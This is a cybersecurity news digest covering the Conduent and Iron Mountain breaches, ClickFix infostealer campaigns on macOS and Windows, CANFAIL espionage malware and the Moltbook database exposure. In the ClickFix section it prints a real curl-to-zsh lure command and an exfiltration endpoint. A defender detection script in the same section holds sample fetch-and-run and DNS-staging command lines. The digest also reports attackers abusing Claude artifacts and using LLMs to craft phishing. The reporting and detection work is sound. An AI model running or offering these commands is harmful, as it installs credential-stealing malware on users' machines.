
All the recent news you need to know

Volvo Hit in Conduent Breach Affecting 25 Million

A major data breach at business services provider Conduent has spiraled into a large-scale security incident affecting at least 25 million people across the United States, with Volvo Group North America among the latest victims. The breach, originally disclosed in early 2025, is now understood to be far more extensive than first reported, impacting residents in multiple states and exposing sensitive personal data. Texas authorities now estimate that 15 million people have been affected, up from an initial 4 million, while more than 10 million individuals in Oregon have also been caught up in the incident.

Conduent first confirmed in November 2025 that a cyberattack in January 2025 had exposed personal data belonging to over 10 million people. The compromised information included names, addresses, dates of birth, Social Security numbers, and health and insurance details, making it highly valuable for identity theft and fraud. Earlier, in April 2025, the company had revealed that attackers stole names and Social Security numbers during the same January intrusion, highlighting a pattern of gradually escalating disclosures as the scale of the breach became clearer.

Operational disruption accompanied the data exposure, as Conduent disclosed that a January cyberattack caused service outages impacting agencies in multiple U.S. states. Wisconsin and Oklahoma reported issues affecting payments and customer support, underscoring how attacks on back-office providers can cascade into interruptions of public services. Subsequent investigation determined that hackers had maintained access to Conduent’s network from October 21, 2024, to January 13, 2025, giving them ample time to exfiltrate personal data, including Social Security numbers, dates of birth, addresses, and health-related information.

The Safepay ransomware group later claimed responsibility for the attack in February 2025, adding an extortion dimension to the incident. Conduent, which offers printing and mailroom services, document processing, payment integrity, and other back-office support, has been sending breach notifications on behalf of affected clients, including Volvo Group North America. According to a filing with the Maine Attorney General, Volvo reported that 16,991 employees were impacted, and the company said it only learned of the incident in January 2026, many months after the original intrusion window.

In its notification letters, Conduent informed individuals that some of their personal information may have been involved due to services provided to their current or former health plans. The company stated it is not aware of any attempted or actual misuse of the compromised data but is urging recipients to consider steps to protect themselves. As part of its response, Conduent is offering free identity protection services to those affected, reflecting ongoing concern about long-term risks posed by the theft of such highly sensitive information.

ClickFix Campaigns Exploit Claude Artifacts to Target macOS Users with Infostealers

One out of every hundred Mac users searching online might now face hidden risks. Instead of helpful tools, some find traps disguised as guides - especially when looking up things like "DNS resolver" or "Homebrew." Behind these results, attackers run silent operations using fake posts linked to real services. Notably, they borrow content connected to Claude, spreading it through paid search ads on Google. Each click can lead straight into their hands. Two separate versions of this scheme are already circulating. Evidence suggests more than ten thousand people followed the harmful steps without knowing. Most never realized what was taken. Quiet but widespread, the pattern reveals how easily trust gets hijacked in plain sight.

Beginning with public posts shaped by Anthropic’s AI, a Claude artifact emerges when someone shares output from the system online. Hosted on claude.ai, such material might include scripts, how-tos, or fragments of working code - open for viewing through shared URLs. During recent ClickFix operations, deceptive search entries reroute people toward counterfeit versions of these documents. Instead of genuine help, visitors land on forged Medium pieces mimicking Apple's support site. From there, directions appear telling them to insert command-line strings straight into Terminal. Though it feels harmless at first glance, that single step triggers the start of compromise. 

The technical execution of these attacks involves two primary command variants. One common method utilizes an `echo` command, which is then piped through `base64 -D | zsh` for execution. The second variant employs a `curl` command to covertly fetch and execute a remote script: `true && cur""l -SsLfk --compressed "https://raxelpak[.]com/curl/[hash]" | zsh`. Upon successful execution of either command, the MacSync infostealer is deployed onto the macOS system. This potent malware is specifically engineered to exfiltrate a wide array of sensitive user data, including crucial keychain information, browser data, and cryptocurrency wallet details. 

One way attackers stay hidden involves disguising their traffic as ordinary web requests. A suspicious Claude guide, spotted by Moonlock Lab analysts, reached more than 15,600 users - an indicator of wide exposure. Instead of sending raw information, the system bundles stolen content neatly into a ZIP file, often stored temporarily under `/tmp/osalogging.zip`. This package then travels outward through an HTTP POST directed at domains such as `a2abotnet[.]com/gate`. Behind the scenes, access relies on fixed credentials: a preset token and API key baked directly into the code. For extra stealth, it mimics a macOS-based browser's digital fingerprint during exchanges. When uploads stall, the archive splits into lighter segments, allowing repeated tries - up to eight attempts occur if needed. Once delivery finishes, leftover files vanish instantly, leaving minimal evidence behind.  

This latest operation looks much like earlier efforts where hackers used chat-sharing functions in major language models - like ChatGPT and Grok - to spread the AMOS infostealer. What makes the shift toward targeting Claude notable is how attackers keep expanding their methods across different AI systems. Because of this, users need to stay highly alert, especially when it comes to running Terminal instructions they do not completely trust. One useful check, pointed out by Kaspersky analysts, means pausing first to ask the same assistant about any command’s intent and risk before carrying it out.

New ClickFix Campaign Uses Nslookup to Fetch Malicious PowerShell Script


According to Microsoft, the ClickFix social engineering technique has been further refined, showing that even the most common system utilities can be repurposed into covert channels for malware distribution. In this latest iteration, attackers no longer rely only on deceptive downloads and embedded scripts to spread malware.

Through carefully staged prompts, they manipulate victims' trust by instructing them to execute what appear to be harmless system commands. Under this veneer of legitimacy, the command initiates a DNS query via nslookup, quietly retrieving the next-stage payload from attacker-controlled infrastructure.

By embedding malicious intent within routine administrative behaviors, the campaign transforms a standard troubleshooting tool into an unassuming channel of infection. In Microsoft's analysis, the newly observed campaign instructs victims to run an nslookup command that queries a DNS server controlled by the attacker instead of the system's configured resolver.

The command requests a specific hostname and sends the query directly to a remote IP address controlled by the threat actor. Instead of returning a regular DNS record, the server responds with a crafted entry that carries a second PowerShell command embedded in the "Name" field.

The Windows command interpreter then parses and executes that response, turning a standard DNS query into a covert staging mechanism for code delivery. According to Microsoft Threat Intelligence, this represents another step in the evolution of ClickFix's evasion strategy.

While earlier versions primarily relied on HTTP-based payload retrieval, this version uses DNS for both communication and dynamic payload distribution. The lure used to persuade users is unclear, but victims are reportedly instructed to execute the command through the Windows Run dialog, which makes the tactic depend on social engineering rather than exploits.

By moving execution to user-initiated system utilities, attackers are reducing the probability that conventional web or network filtering controls will be triggered. PowerShell scripts that are executed in this stage retrieve additional components from infrastructure under attacker control. 

As a result of Microsoft's investigation, it has been determined that the subsequent payload consists of a compressed archive containing a portable Python runtime along with malicious scripts. Prior to establishing persistence on the infected host, these scripts conduct reconnaissance against the host and its domain environment, gathering network and system information. 

For persistence, the malware drops a VBScript file in the user's AppData directory and places a shortcut in the Windows Startup folder so that the script runs at every logon. A remote access trojan named ModeloRAT is deployed as part of the infection chain, granting the operator sustained control over compromised systems.

A DNS-based staging strategy allows adversaries to adjust payloads in real time while blending malicious traffic with routine name resolution activity by embedding executable instructions within DNS responses. As well as complicating detection, this DNS-based staging technique demonstrates that ClickFix continues to refine itself into a modular intrusion framework that is adaptable. 

Microsoft's Threat Intelligence team has also assessed that the intrusion sequence begins with a command launched from the Windows Run dialog, which sends a DNS query straight to a hard-coded, adversary-controlled external resolver. The command output is programmatically filtered to isolate the Name: field of the DNS response, and the result is then executed as the second-stage payload.
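As an added defender-side illustration (not code from Microsoft, Moonlock Lab or this article), the Python below triages process-creation command lines for the ClickFix indicators described in the macOS section (base64 or curl output piped into zsh, the spliced `cur""l` token) and in the Windows nslookup section (an explicit resolver outside the organisation's own, the response narrowed to its Name field, launch from the Run dialog). The resolver addresses, hostnames and sample events are constructed placeholders, not real indicators.

```python
from __future__ import annotations

import re
from dataclasses import dataclass

# Resolvers this (hypothetical) organisation actually uses. Any other address handed to
# nslookup as an explicit server argument bypasses the configured resolver.
KNOWN_RESOLVERS = {"10.0.0.53", "10.0.1.53"}

IPV4 = re.compile(r"^(?:\d{1,3}\.){3}\d{1,3}$")
PIPE_TO_SHELL = re.compile(r"\|\s*(?:zsh|bash|sh)\b")
B64_DECODE = re.compile(r"\bbase64\s+(?:-D|-d|--decode)\b")
# The lookup output being narrowed to the Name: line before it reaches an interpreter.
NAME_FILTER = re.compile(r"\bfindstr\b.*\bName\b|\bSelect-String\b.*\bName\b|\bfor\s+/f\b", re.I)


@dataclass(frozen=True)
class Finding:
    rule: str
    detail: str


def normalize(cmd: str) -> str:
    """Undo the empty-quote-pair splice used in the macOS lure (cur""l -> curl).

    Heuristic: a genuine empty-string argument such as echo "" is also collapsed.
    """
    return re.sub(r"""(["'])\1""", "", cmd)


def triage(cmdline: str, parent: str = "") -> list[Finding]:
    """Return the ClickFix indicators present in one process-creation event.

    cmdline is the command line as logged; parent is the parent image name, if known.
    """
    findings: list[Finding] = []
    cmd = normalize(cmdline)
    if cmd != cmdline:
        findings.append(Finding("spliced_token", "empty quote pairs split a command name"))

    piped = PIPE_TO_SHELL.search(cmd) is not None
    if piped and B64_DECODE.search(cmd):
        findings.append(Finding("decode_then_exec", "base64 output piped into a shell"))
    if piped and re.search(r"\bcurl\b", cmd):
        short_flags = re.findall(r"(?<=\s)-[A-Za-z]+", cmd)  # -SsLfk style clusters only
        detail = "curl output piped into a shell"
        if any("k" in f for f in short_flags):
            detail += ", TLS checks disabled (-k)"
        findings.append(Finding("download_then_exec", detail))

    tokens = cmd.replace("|", " | ").split()
    if "nslookup" in tokens:
        after = tokens[tokens.index("nslookup") + 1:]
        if "|" in after:
            after = after[:after.index("|")]
        args = [t for t in after if not t.startswith("-")]  # drop -type=... options
        server = args[1] if len(args) > 1 else None  # nslookup <name> [server]
        if server and IPV4.match(server) and server not in KNOWN_RESOLVERS:
            findings.append(Finding("external_resolver",
                                    f"query sent to {server}, not a configured resolver"))
            if NAME_FILTER.search(cmd):
                findings.append(Finding("dns_staging",
                                        "response Name field isolated for use as a command"))

    # A suspicious command whose parent is the desktop shell matches the Run-dialog lure.
    if findings and parent.lower() == "explorer.exe":
        findings.append(Finding("run_dialog_launch", "spawned directly from explorer.exe"))
    return findings


# Constructed sample events; domains and addresses are placeholders, not real indicators.
SAMPLE_EVENTS = [
    ("macos", "", "echo QUJDRA== | base64 -D | zsh"),
    ("macos", "", 'true && cur""l -SsLfk --compressed "https://lure.example.invalid/curl/PLACEHOLDER" | zsh'),
    ("windows", "explorer.exe", "cmd /c nslookup lookup.example.invalid 203.0.113.7 | findstr Name"),
    ("windows", "cmd.exe", "nslookup intranet.corp.example 10.0.0.53"),
    ("linux", "bash", "curl -sSL https://example.com/f.tar.gz -o f.tar.gz"),
]

if __name__ == "__main__":
    for platform, parent, cmdline in SAMPLE_EVENTS:
        hits = triage(cmdline, parent)
        print(f"[{platform}] {cmdline}\n    -> {[f.rule for f in hits] or 'no findings'}")
```

The rules are deliberately narrow; in production the resolver allowlist would come from the organisation's DHCP or GPO configuration rather than a hard-coded set.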

There has been documentation of this technique being used in multiple malware distribution campaigns, including campaigns that deliver Lumma Stealer. This malware has been detected in India, France, the United States, Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada. 

Attributed to the GrayBravo threat actor, Lumma Stealer incorporates environmental awareness checks, identifying virtualization platforms and specific security products before decrypting and executing its payload directly in memory to evade analysis and detection. 

ClickFix has evolved beyond its earlier reliance on phishing emails, malvertising networks, and drive-by download schemes toward DNS-based staging. By exploiting procedural trust rather than software flaws, operators persuade users to execute commands that supposedly resolve benign system problems.

A parallel campaign distributing Lumma Stealer used CastleLoader and RenEngine Loader as primary delivery mechanisms. CastleLoader has been deployed by compromised websites that present fraudulent CAPTCHA verification prompts instructing victims to use PowerShell. 

In campaigns targeting users in Russia, Brazil, Turkey, Spain, Germany, Mexico, Algeria, Egypt, Italy, and France, RenEngine Loader facilitates the deployment of Hijack Loader, which in turn installs Lumma Stealer on compromised hosts. The operational footprint of these campaigns is not limited to Windows environments.

The evidence suggests that macOS-targeted infostealer activity has increased dramatically in recent years, which indicates that long-held assumptions about Apple platform immunity have been eroded. In order to capitalize on the concentration of high-value software wallets within the macOS ecosystem, attackers frequently prioritize cryptocurrency theft. 

There are numerous tactics, techniques, and procedures that macOS-specific detection strategies must consider, including unsigned applications requesting elevated credentials, anomalous Terminal execution patterns, suspicious outbound connections to blockchain infrastructure that are unrelated to financial workflows, as well as attempts to exfiltrate data from Keychain repositories and browser storage media. 

In addition to ClickFix itself, many other variants and affiliate campaigns have been launched. Security analysts have documented macOS-focused operations utilizing phishing and malvertising to distribute Odyssey Stealer, a rebranded version of Poseidon Stealer. Using compromised websites that appear legitimate, attackers have hosted deceptive CAPTCHA pages that trigger the deployment of StealC information stealer via PowerShell.

Additionally, malicious SVG files embedded in password-protected ZIP archives have instructed victims to execute ClickFix commands, leading to the installation of Stealerium, an open-source .NET infostealer. More unconventionally, adversaries have used the public sharing features of generative AI services such as Anthropic's Claude to publish staged ClickFix instructions aimed at macOS systems.

One campaign manipulated search results for macOS command-line disk space analysis tools, redirecting users to a fake Medium article impersonating Apple Support that ultimately delivered stealer payloads from external infrastructure. These developments show ClickFix becoming a cross-platform social engineering framework with growing operational flexibility, able to adapt to diverse malware environments.

The malware maintains long-term access by creating a Windows shortcut (LNK) to the previously dropped VBScript component in the Startup directory. Because the malicious script then runs every time the operating system boots, the infection is embedded in the host's routine startup sequence.

This disclosure is consistent with Bitdefender's separate findings, which show that Lumma Stealer activity has increased significantly as a result of ClickFix-type campaigns built around fake CAPTCHA verification prompts. These operations use the AutoIt-based CastleLoader malware loader, which is linked to the threat actor GrayBravo, formerly known as TAG-150.

After detecting virtualization platforms and specific security tools, CastleLoader decrypts and executes the stealer payload in memory, a technique designed to thwart sandbox analysis and endpoint detection. 

Furthermore, CastleLoader has been distributed via websites that advertise pirated and cracked software, as well as through ClickFix-driven distribution channels. In these scenarios, users download a rogue installer or executable masquerading as a legitimate MP4 file.

In addition, counterfeit NSIS installers have been used to execute obfuscated VBA scripts before starting the embedded AutoIt loader responsible for installing Lumma Stealer. The VBA component also creates scheduled tasks that reinforce persistence.

The Bitdefender assessment indicates that, despite coordinated law enforcement actions in 2025 designed to disrupt Lumma Stealer infrastructure, Lumma Stealer has demonstrated considerable resilience. 

Operators are rotating loaders and delivery techniques to maintain infection volumes while rapidly migrating to alternative hosting providers. Several of these campaigns remain centered on CastleLoader, which serves as a primary distribution tool within Lumma's broader ecosystem. Analysis of CastleLoader infrastructure found overlaps with domains previously identified as Lumma Stealer command-and-control servers, suggesting that the two malware clusters collaborate operationally or share service providers.

According to infection telemetry, the largest number of Lumma Stealer cases originate in India, followed by France, the United States, Spain, Germany, Brazil, Mexico, Romania, Italy, and Canada. In Bitdefender's view, ClickFix's sustained success is due not to zero-day exploits or sophisticated technical vulnerabilities but to the exploitation of procedural trust.

To reduce suspicion and increase compliance, the instructions presented to victims are designed to look like legitimate troubleshooting or verification procedures. Users believe they are resolving a routine system issue and inadvertently execute malicious code. CastleLoader is not the sole delivery mechanism facilitating Lumma Stealer's spread.

The RenEngine Loader has also been used for campaign purposes since at least March 2025, commonly posing as game cheats or pirated commercial software such as CorelDRAW. In these attack chains, RenEngine Loader also deploys a secondary component, Hijack Loader, which installs Lumma Stealer as a result.

It is evident from these parallel loader frameworks that the Lumma distribution ecosystem is modular and adaptive, which reinforces its persistence irrespective of sustained disruption attempts. As ClickFix and its associated loader ecosystem continue to be refined, organizations must recognize a greater defensive imperative. 

Organizations cannot rely on perimeter filtering or signature-based detection alone to mitigate malicious activities originating within trusted system utilities and user workflows anymore. As part of defensive strategies, PowerShell logging should be strictly enforced, DNS queries should be monitored for anomalous patterns, and behavior detection can be used to identify command-line abuse from user-initiated processes. 

Similarly, it is crucial to implement application control policies, restrict script execution, and monitor persistence mechanisms, such as Startup folder modifications and scheduled tasks, at an early stage. Training in procedural social engineering, not just phishing links and attachments, is also vital for sustained user awareness.

Since such campaigns rely increasingly on convincing users to execute commands themselves, security programs must emphasize the risks of running unsolicited system instructions, regardless of how routine they appear. As ClickFix has evolved into a cross-platform, DNS-enabled staging framework, maintaining defensive resilience means recognizing and disrupting the intersection of social engineering and trusted system utilities that these campaigns exploit.

Google Links CANFAIL Malware Attacks to Suspected Russia-Aligned Group

A newly identified cyber espionage group has been linked to a wave of digital attacks against Ukrainian institutions, according to findings released by the Google Threat Intelligence Group. Investigators say the activity involves a malware strain tracked as CANFAIL and assess that the operator is likely connected to Russian state intelligence interests.

The campaign has primarily focused on Ukrainian government structures at both regional and national levels. Entities tied to defense, the armed forces, and the energy sector have been repeatedly targeted. Analysts state that the selection of victims reflects strategic priorities consistent with wartime intelligence gathering.

Beyond these sectors, researchers observed that the actor’s attention has widened. Aerospace companies, manufacturers producing military equipment and drone technologies, nuclear and chemical research institutions, and international organizations engaged in conflict monitoring or humanitarian assistance in Ukraine have also been included in targeting efforts. This broader focus indicates an attempt to collect information across supply chains and support networks linked to the war.

While the group does not appear to possess the same operational depth as some established Russian hacking units, Google’s analysts note a recent shift in capability. The actor has reportedly begun using large language models to assist in reconnaissance, draft persuasive phishing content, and resolve technical challenges encountered after gaining initial access. These tools have also been used to help configure command-and-control infrastructure, allowing the attackers to manage compromised systems more effectively.

Email-based deception remains central to the intrusion strategy. In several recent operations, the attackers posed as legitimate Ukrainian energy providers in order to obtain unauthorized access to both organizational and personal email accounts. In separate incidents, they impersonated a Romanian energy supplier that serves Ukrainian clients. Investigators also documented targeting of a Romanian company and reconnaissance activity involving organizations in Moldova, suggesting regional expansion of the campaign.

To improve the precision of their phishing efforts, the attackers compile tailored email distribution lists based on geographic region and industry sector. The malicious messages frequently contain links hosted on Google Drive. These links direct recipients to download compressed RAR archives that contain the CANFAIL payload.

CANFAIL itself is a heavily obfuscated JavaScript program. It is commonly disguised with a double file extension, such as “.pdf.js,” to make it appear as a harmless document. When executed, the script launches a PowerShell command that retrieves an additional PowerShell-based dropper. This secondary component runs directly in system memory, a technique designed to reduce forensic traces on disk and evade conventional security tools. At the same time, the malware displays a fabricated error notification to mislead the victim into believing the file failed to open.

Google’s researchers further link this threat activity to a campaign known as PhantomCaptcha. That operation was previously documented in October 2025 by researchers at SentinelOne through its SentinelLABS division. PhantomCaptcha targeted organizations involved in Ukraine-related relief initiatives by sending phishing emails that redirected recipients to fraudulent websites. Those sites presented deceptive instructions intended to trigger the infection process, ultimately delivering a trojan that communicates over WebSocket channels.

The investigation illustrates how state-aligned actors continue to adapt their methods, combining traditional phishing tactics with newer technologies to sustain intelligence collection efforts tied to the conflict in Ukraine.

Iron Mountain Data Breach Only Impacted Marketing Resources


Data storage and recovery services company Iron Mountain suffered a data breach for which the extortion gang Everest has claimed responsibility. Iron Mountain said the breach was limited to marketing materials. The company specializes in records management and data centers and has more than 240,000 customers in 61 countries.

About the breach 

The gang claimed responsibility on the dark web, saying it stole 1.4 TB of internal company documents. The threat actors used leaked login credentials to access a single folder containing marketing materials on a file-sharing server.

Experts said that Everest actors didn't install any ransomware payloads on the server, and no extra systems were breached. No sensitive information was exposed. The compromised login accessed one folder that had marketing materials. 

The Everest ransomware group has been active since 2020 and has changed its tactics over time. It used to encrypt targets' systems with ransomware; now it focuses on data-theft-only corporate extortion. Everest is also known for acting as an initial access broker for other hackers and groups, selling access to compromised networks.

History 

In the last five years, Everest's victim list has grown to hundreds of entries on its leak portal, which is used in double-extortion attacks where the hackers threaten to publish stolen files if the victims don't pay the ransom.

The U.S. Department of Health and Human Services also issued a warning in August 2024 that Everest was increasingly focusing on healthcare institutions nationwide. More recently, the cybercrime operation removed its website in April 2025 after it was vandalized and the statement "Don't do crime CRIME IS BAD xoxo from Prague" was posted in its place.

If the reports of sensitive data theft turn out to be accurate, Iron Mountain's clients and partners may be at risk of identity theft and targeted phishing. Iron Mountain's present evaluation, however, suggests that the danger is restricted to the disclosure of non-confidential marketing and research documents. 

What is the impact?

Such purported leaks usually result in short-term reputational issues while forensic investigations are being conducted. Iron Mountain has deactivated the compromised credential as a precaution and is still keeping an eye on its systems. 

Vendors or affected parties who used the aforementioned file-sharing website should be on the lookout for odd communications. Iron Mountain's response to these unsubstantiated allegations must be transparent throughout the investigation.

Moltbook Data Leak Reveals 1.5 Million Tokens Exposed in AI Social Platform Security Flaw

Moltbook has recently captured worldwide attention—not only for its unusual concept as a dystopian-style social platform centered on artificial intelligence, but also for significant security and privacy failures uncovered by researchers.

The platform presents itself as a Reddit-inspired network built primarily for AI agents. Developed using a “vibe-coded” approach—where the creator relied on AI tools to generate the code rather than writing it manually—Moltbook allows users to observe AI agents conversing with one another. These exchanges reportedly include topics such as existential reflection and discussions about escaping human control.

However, cybersecurity firm Wiz conducted an in-depth review of the platform and identified serious flaws. According to its findings, the AI agents interacting on the site were not entirely autonomous. More concerningly, the platform exposed sensitive user information affecting thousands.

In its report, Wiz said it performed a “non-intrusive security review” by navigating the platform as a regular user. Within minutes, researchers discovered a Supabase API key embedded in client-side JavaScript. The exposed key granted unauthenticated access to the production database, allowing both read and write operations across all tables.

“The exposure included 1.5 million API authentication tokens, 35,000 email addresses, and private messages between agents. We immediately disclosed the issue to the Moltbook team, who secured it within hours with our assistance, and all data accessed during the research and fix verification has been deleted,” the researchers explained.

The team clarified that the presence of a visible API key “does not automatically indicate a security failure,” noting that Supabase is “designed to operate with certain keys exposed to the client.” However, in this case, the backend configuration created a critical vulnerability.

“Supabase is a popular open-source Firebase alternative providing hosted PostgreSQL databases with REST APIs,” Wiz explained. “When properly configured with Row Level Security (RLS), the public API key is safe to expose - it acts like a project identifier. However, without RLS policies, this key grants full database access to anyone who has it. In Moltbook’s implementation, this critical line of defense was missing.”

Beyond the data exposure, the investigation also cast doubt on Moltbook’s central claim of hosting a fully autonomous AI ecosystem. Researchers concluded that human operators were significantly involved behind the scenes. “The revolutionary AI social network was largely humans operating fleets of bots.”

For now, Moltbook’s vision of independent AI entities engaging freely online appears to remain closer to speculative fiction than technological reality.